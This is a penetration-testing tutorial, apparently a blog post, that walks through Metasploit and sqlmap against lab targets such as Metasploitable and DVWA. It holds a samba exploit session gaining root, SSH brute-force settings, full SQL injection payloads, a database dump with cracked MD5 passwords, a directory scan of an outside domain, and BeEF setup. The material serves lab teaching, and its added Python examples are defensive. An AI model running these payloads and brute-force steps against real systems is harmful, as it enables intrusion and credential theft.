    在MSF终端里看到了“Command shell session 1 opened”的成功信息,这时可以输入一些Shell命令,如uname -a和whoami,来查看所控制的目标主机操作系统类型,以及所拥有的用户账户权限

    msf6 exploit(multi/samba/usermap_script) > exploit
    
    [*] Started bind TCP handler against 10.10.10.254:4444
    [*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800
    
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
    whoami
    root
    ip addr
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
        inet6 ::1/128 scope host
           valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
        link/ether 00:0c:29:a8:c8:7a brd ff:ff:ff:ff:ff:ff
        inet 10.10.10.254/24 brd 10.10.10.255 scope global eth0
        inet6 fe80::20c:29ff:fea8:c87a/64 scope link
           valid_lft forever preferred_lft forever
    3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
        link/ether 00:0c:29:a8:c8:84 brd ff:ff:ff:ff:ff:ff
        inet 192.168.10.254/24 brd 192.168.10.255 scope global eth1
        inet6 fe80::20c:29ff:fea8:c884/64 scope link
           valid_lft forever preferred_lft forever
    

    Penetration testing the simulated environment

    The following leaves out the project-management aspects of a formal penetration test and simply uses Metasploit's various modules against the simulated environment.

    modules
        ├─auxiliary  # auxiliary modules
        ├─encoders  # encoder modules
        ├─evasion  # evasion modules
        ├─exploits  # exploit modules
        ├─nops  # NOP modules
        ├─payloads  # payload modules
        └─post  # post-exploitation modules
    

    Intelligence gathering

    Metasploit provides a large number of auxiliary modules for the information-gathering phase of a penetration test, including modules for scanning and enumerating various network services, building fake services to collect login credentials, password guessing and cracking, sniffing sensitive information, probing for sensitive information leaks, fuzz testing to discover vulnerabilities, and network protocol spoofing. Auxiliary modules help the tester obtain rich intelligence about the target system before exploitation, so that more targeted and precise attacks can be launched.
    In the intelligence-gathering phase Metasploit mainly uses auxiliary modules.
    auxiliary: contains scanning, fuzz testing, vulnerability discovery and network protocol spoofing programs.

    Check DNS resolution with nslookup

    msf6 > nslookup www.dvssc.com
    [*] exec: nslookup www.dvssc.com
    
    服务器:  RTK_GW.bbrouter
    Address:  192.168.1.1
    
    非权威应答:
    名称:    hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
    Addresses:  54.209.32.212
              52.71.57.184
    Aliases:  www.dvssc.com
              traff-1.hugedomains.com
    

    whois

    https://whois.chinaz.com/
    

    Use the dir_scanner auxiliary module to find website directories

    msf6 > use auxiliary/scanner/http/dir_scanner
    msf6 auxiliary(scanner/http/dir_scanner) > set threads 50
    threads => 50
    msf6 auxiliary(scanner/http/dir_scanner) > set rhosts www.dvssc.com
    rhosts => www.dvssc.com
    msf6 auxiliary(scanner/http/dir_scanner) > exploit
    
    [-] Warning: The Windows platform cannot reliably support more than 16 threads
    [-] Thread count has been adjusted to 16
    [*] Detecting error code
    [*] Using code '404' as not found for 10.10.10.129
    [+] Found http://www.dvssc.com:80/001/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/1/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/3/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/0001/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/0/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/00001/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/1000/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/11/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/111/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/10/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/04/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/123/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/1111/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/007/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/123321/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/123123/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/1337/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/2/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/777/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/6/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/5/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/666/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/8/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/7/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/606/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/4/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/911911/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/9/ 503 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/CHANGELOG/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/LICENSE/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/administrator/ 302 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/cache/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/cgi-bin/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/components/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/css/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/doc/ 403 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/f/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/gallery2/ 302 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/ghost/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/icons/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/images/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/includes/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/installation/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/javascript/ 403 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/js/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/libraries/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/language/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/login/ 500 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/logs/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/media/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/modules/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/phpBB2/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/plugins/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/phpmyadmin/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/templates/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/tmp/ 200 (10.10.10.129)
    [+] Found http://www.dvssc.com:80/wordpress/ 200 (10.10.10.129)
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/http/dir_scanner) >
    

    Use the arp_sweep module to discover live hosts

    msf6 > use auxiliary/scanner/discovery/arp_sweep
    msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 10.10.10.0/24
    msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10
    msf6 auxiliary(scanner/discovery/arp_sweep) > run
    

    Run the Nmap scanner from within the MSF console

    msf6 > nmap 10.10.10.0/24
    

    Use Nmap for live host discovery

    msf6 > nmap -Pn 10.10.10.0/24
    

    Use Nmap to detect the operating system version of the target hosts

    msf6 > nmap -O 10.10.10.0/24
    

    Telnet service scan

    msf6 > use auxiliary/scanner/telnet/telnet_version
    msf6 auxiliary(scanner/telnet/telnet_version) > set rhost 10.10.10.0/24
    msf6 auxiliary(scanner/telnet/telnet_version) > set threads 100
    msf6 auxiliary(scanner/telnet/telnet_version) > run
    

    SSH service scan

    search ssh_version
    
    msf6 > use auxiliary/scanner/ssh/ssh_version
    msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 10.10.10.0/24
    msf6 auxiliary(scanner/ssh/ssh_version) > set threads 100
    msf6 auxiliary(scanner/ssh/ssh_version) > run
    
    search ssh_login
    
    use auxiliary/scanner/ssh/ssh_login
    set RHOSTS 10.10.10.254
    set RPORT 22
    set STOP_ON_SUCCESS false
    set BLANK_PASSWORDS true
    set USER_FILE "c:\resource\user.txt"
    set PASS_FILE "c:\resource\pass.txt"
    

    Oracle service scan

    msf6 > use auxiliary/scanner/oracle/tnslsnr_version
    msf6 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 10.10.10.0/24
    msf6 auxiliary(scanner/oracle/tnslsnr_version) > set threads 50
    msf6 auxiliary(scanner/oracle/tnslsnr_version) > run
    

    SSH weak password check

    msf6 > use auxiliary/scanner/ssh/ssh_login
    msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.10.254
    msf6 auxiliary(scanner/ssh/ssh_login) > set username root
    msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/words.txt
    msf6 auxiliary(scanner/ssh/ssh_login) > set threads 50
    msf6 auxiliary(scanner/ssh/ssh_login) > run
    

    Capture FTP usernames and passwords by sniffing

    msf6 > use auxiliary/sniffer/psnuffle
    msf6 auxiliary(sniffer/psnuffle) > run
    

    Nessus network vulnerability scan

    For details, see the separate article on deploying Nessus in a CentOS Docker environment

    Exploitation

    Metasploit exploits security vulnerabilities in the target system to break in and gain access control. In the exploitation phase Metasploit mainly relies on exploit modules and payload modules.
    Exploit module: a program that, when run, uses a security vulnerability in the target to carry out the security test.
    Payload module: once the exploit against the target succeeds, the payload runs on the target machine and gives us the access and execution privileges we need there.

    Web application penetration

    SQL injection

    Sqlmap scan
    Metasploit no longer ships a Sqlmap module, so Sqlmap has to be installed separately.
    Install python3 directly from the Windows 10 Store.
    https://sqlmap.org/
    Download it, unpack it, rename the folder to sqlmap and place it on the C: drive; then run it directly as python c:/sqlmap/sqlmap.py followed by its arguments.


    http://10.10.10.129/dvwa/login.php
    
    username:admin
    password:admin
    

    Select Damn Vulnerable Web Application
    Set DVWA Security to low

    Select SQL Injection

    python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
    
    PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
            ___
           __H__
     ___ ___[)]_____ ___ ___  {1.6.4.4#dev}
    |_ -| . [)]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 21:21:13 /2022-04-14/
    
    [21:21:14] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
    do you want to try URI injections in the target URL itself? [Y/n/q]
    
    [21:21:15] [INFO] testing connection to the target URL
    got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow? [Y/n]
    
    you have not declared cookie(s), while server wants to set its own ('PHPSESSID=9547p2gdpmv...u0t9jme0i1;security=high;security=high'). Do you want to use those [Y/n]
    
    [21:21:17] [INFO] testing if the target URL content is stable
    [21:21:17] [WARNING] URI parameter '#1*' does not appear to be dynamic
    [21:21:17] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
    [21:21:17] [INFO] testing for SQL injection on URI parameter '#1*'
    [21:21:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [21:21:17] [WARNING] reflective value(s) found and filtering out
    [21:21:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
    [21:21:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:21:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
    [21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
    [21:21:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
    [21:21:17] [INFO] testing 'Generic inline queries'
    [21:21:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
    [21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
    [21:21:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
    [21:21:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [21:21:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
    [21:21:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
    [21:21:18] [INFO] testing 'Oracle AND time-based blind'
    it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
    
    [21:21:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
    [21:21:19] [WARNING] URI parameter '#1*' does not seem to be injectable
    [21:21:19] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
    [21:21:19] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 72 times
    
    [*] ending @ 21:21:19 /2022-04-14/
    

    Sqlmap prompt: it still expects us to supply parameters for the GET or POST request, so we add the parameters

    you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
    do you want to try URI injections in the target URL itself?
    

    Sqlmap prompt: it reports that during testing it gets a 302 redirect to the login page, so we add the Cookie to stay logged in

    testing connection to the target URL
    got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow?
    

    Sqlmap prompt: it has found no injection point so far and asks whether to reduce the number of requests

    it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests?
    

    Open the F12 developer tools, refresh the page and click any request to view the Cookie

    python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
    
    PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.6.4.4#dev}
    |_ -| . [.]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 21:47:37 /2022-04-14/
    
    [21:47:37] [INFO] resuming back-end DBMS 'mysql'
    [21:47:37] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
        Payload: id=1' OR NOT 8674=8674#&Submit=Submit
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
    ---
    [21:47:37] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL >= 5.0
    [21:47:37] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'
    
    [*] ending @ 21:47:37 /2022-04-14/
    

    Sqlmap output: the back-end database is MySQL

    resuming back-end DBMS 'mysql'
    

    Sqlmap output: the injection point is Parameter: id (GET)

    Parameter: id (GET)
    

    Sqlmap output: the injection types found are boolean-based blind, error-based, time-based blind and UNION query

    Type: boolean-based blind
    Type: error-based
    Type: time-based blind
    Type: UNION query
    

    Sqlmap output: the payloads

    Payload: id=1' OR NOT 8674=8674#&Submit=Submit
    Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
    Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
    Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
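
The boolean-based payload above works because the application splices the id value straight into the SQL text. The following is an added example, not code from the page, DVWA or sqlmap: it rebuilds the dumped users table in SQLite, runs that payload through a string-concatenated query shaped like DVWA's low-security page (an assumption) and through a parameterized one, and turns sqlmap's TRUE/FALSE probe pair into a regression test; MySQL's `#` line comment is written as SQLite's `--`.

```python
import sqlite3

# Constructed copy of dvwa.users as it appears in the dump above
# (user_id, user, first_name, last_name); the password column is left out.
USERS = [
    (1, "admin", "admin", "admin"),
    (2, "gordonb", "Gordon", "Brown"),
    (3, "1337", "Hack", "Me"),
    (4, "pablo", "Pablo", "Picasso"),
    (5, "smithy", "Bob", "Smith"),
]

# sqlmap's boolean-based probe from the page, with MySQL's '#' comment
# rewritten as SQLite's '--'. The comment swallows the closing quote that
# the application appends after the value.
PAYLOAD_FALSE = "1' OR NOT 8674=8674-- "  # OR FALSE: same rows as id=1
PAYLOAD_TRUE = "1' OR NOT 8674=8675-- "   # OR TRUE: every row (constructed sibling probe)


def build_db():
    """In-memory SQLite stand-in for the DVWA MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, "
        "first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Query shaped like DVWA's low-security sqli page (assumed): the id is
    spliced into the SQL text, so quotes and comments inside it get parsed."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value travels as a bound parameter, so it is only
    ever compared against user_id, never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def boolean_oracle_present(conn, lookup):
    """The check behind sqlmap's 'boolean-based blind' finding: the endpoint
    leaks one bit per request if a TRUE and a FALSE probe return different
    results. Usable as a regression test on the fixed code path."""
    return lookup(conn, PAYLOAD_TRUE) != lookup(conn, PAYLOAD_FALSE)


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, FALSE probe:", lookup_vulnerable(db, PAYLOAD_FALSE))
    print("vulnerable, TRUE probe: ", lookup_vulnerable(db, PAYLOAD_TRUE))
    print("parameterized, TRUE probe:", lookup_parameterized(db, PAYLOAD_TRUE))
    print("oracle on vulnerable:", boolean_oracle_present(db, lookup_vulnerable))
    print("oracle on parameterized:", boolean_oracle_present(db, lookup_parameterized))
```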
    

    Add the --dump option to retrieve the database contents. The test environment holds little data, so it can be dumped directly; with large volumes, enumerate step by step: databases, tables, columns, then data, using the --dbs, --tables, --columns and --dump options respectively.

    python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
    
    PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
            ___
           __H__
     ___ ___["]_____ ___ ___  {1.6.4.4#dev}
    |_ -| . [,]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting @ 21:57:58 /2022-04-14/
    
    [21:57:58] [INFO] resuming back-end DBMS 'mysql'
    [21:57:58] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
        Payload: id=1' OR NOT 8674=8674#&Submit=Submit
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
    ---
    [21:57:58] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    [21:57:58] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
    [21:57:58] [INFO] fetching current database
    [21:57:58] [INFO] fetching tables for database: 'dvwa'
    [21:57:58] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
    [21:57:58] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
    [21:57:58] [WARNING] reflective value(s) found and filtering out
    Database: dvwa
    Table: guestbook
    [1 entry]
    +------------+------+-------------------------+
    | comment_id | name | comment                 |
    +------------+------+-------------------------+
    | 1          | test | This is a test comment. |
    +------------+------+-------------------------+
    
    [21:57:58] [INFO] table 'dvwa.guestbook' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\guestbook.csv'
    [21:57:58] [INFO] fetching columns for table 'users' in database 'dvwa'
    [21:57:58] [INFO] fetching entries for table 'users' in database 'dvwa'
    [21:57:58] [INFO] recognized possible password hashes in column 'password'
    do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
    
    do you want to crack them via a dictionary-based attack? [Y/n/q]
    
    [21:58:04] [INFO] using hash method 'md5_generic_passwd'
    what dictionary do you want to use?
    [1] default dictionary file 'C:\sqlmap\data\txt\wordlist.tx_' (press Enter)
    [2] custom dictionary file
    [3] file with list of dictionary files
    >
    
    [21:58:04] [INFO] using default dictionary
    do you want to use common password suffixes? (slow!) [y/N]
    
    [21:58:05] [INFO] starting dictionary-based cracking (md5_generic_passwd)
    [21:58:05] [INFO] starting 8 processes
    [' for hash '21:58:11e99a18c428cb38d5f260853678922e03] ['
    [21:58:1321:58:13] [] [INFOINFO] cracked password '] current status: BCfNi... /charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
    [21:58:16] [INFO] cracked password 'admin' for hash '21232f297a57a5a743894a0e4a801fc3'
    ['NFO21:58:17] cracked password '] [INFOletmein] current status: bab12... -' for hash '0d107d09f5bbe40cade3de5c71e9e9b7
    [password21:58:19' for hash '] [5f4dcc3b5aa765d61d8327deb882cf99INFO'
    Database: dvwa
    Table: users
    [5 entries]
    +---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
    | user_id | user    | avatar                                          | password                                    | last_name | first_name |
    +---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
    | 1       | admin   | http://owaspbwa/dvwa/hackable/users/admin.jpg   | 21232f297a57a5a743894a0e4a801fc3 (admin)    | admin     | admin      |
    | 2       | gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
    | 3       | 1337    | http://owaspbwa/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
    | 4       | pablo   | http://owaspbwa/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
    | 5       | smithy  | http://owaspbwa/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
    +---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
    
    [21:58:30] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\users.csv'
    [21:58:30] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'
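
The users table above stores passwords as bare MD5 digests, which is why sqlmap's dictionary attack finished within seconds. Added example, not part of the page, DVWA or sqlmap: it reproduces the shared lookup-table check against the dumped hashes with a constructed six-word list, then shows the salted PBKDF2 storage that removes that shortcut; the iteration count and the encoded string format are assumptions.

```python
import hashlib
import hmac
import os
import re

# The password column as dumped from dvwa.users above: user -> stored value.
DUMPED_PASSWORDS = {
    "admin": "21232f297a57a5a743894a0e4a801fc3",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337": "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo": "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy": "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed six-word list; sqlmap's default wordlist is far larger.
WORDLIST = ["123456", "admin", "abc123", "charley", "letmein", "password"]


def looks_like_raw_md5(value):
    """32 lowercase hex digits and nothing else: the shape sqlmap keyed on
    when it reported 'recognized possible password hashes'."""
    return re.fullmatch(r"[0-9a-f]{32}", value) is not None


def audit_unsalted_md5(stored, wordlist):
    """Why the dump cracked in seconds: without a salt, one MD5 per candidate
    word tests every user at once. Returns user -> matched word, or None
    when the stored value is not a raw MD5 or no word in the list matches."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table.get(h) if looks_like_raw_md5(h) else None
            for user, h in stored.items()}


def hash_password(password, iterations=600_000, salt=None):
    """Hardened storage: PBKDF2-HMAC-SHA256 with a random 16-byte salt per
    user. The salt defeats the shared lookup table above; the iteration count
    makes each guess cost ~600k hash operations instead of one. The
    'algo$iterations$salt$digest' layout is an assumed, self-describing format."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, encoded):
    """Recomputes the digest from the stored salt and iteration count and
    compares in constant time."""
    algo, iterations, salt_hex, digest_hex = encoded.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for user, word in audit_unsalted_md5(DUMPED_PASSWORDS, WORDLIST).items():
        print(f"{user}: {'matched ' + word if word else 'no match'}")
    stored = hash_password("password")
    print(stored)
    print("verify correct:", verify_password("password", stored))
    print("verify wrong:  ", verify_password("admin", stored))
```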
    

    Cross-site scripting

    XSSF is no longer maintained, so use Beef-XSS instead

    https://github.com/beefproject/beef/

    Start Kali Linux and install Beef-XSS

    cd /etc/
    
    git clone https://github.com/beefproject/beef.git
    
    cd beef
    
    ./install
    

    Start Beef

    ./beef
    

    It warns that the default username and password must be changed

    root@DESKTOP-9I2FBB4:/etc/beef# ./beef
    [22:52:19][!] ERROR: Default username and password in use!
    [22:52:19]    |_  Change the beef.credentials.passwd in config.yaml
    
    vi config.yaml
    
    # Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
    # Browser Exploitation Framework (BeEF) - http://beefproject.com
    # See the file 'doc/COPYING' for copying permission
    #
    # BeEF Configuration file
    
    beef:
        version: '0.5.4.0'
        # More verbose messages (server-side)
        debug: false
        # More verbose messages (client-side)
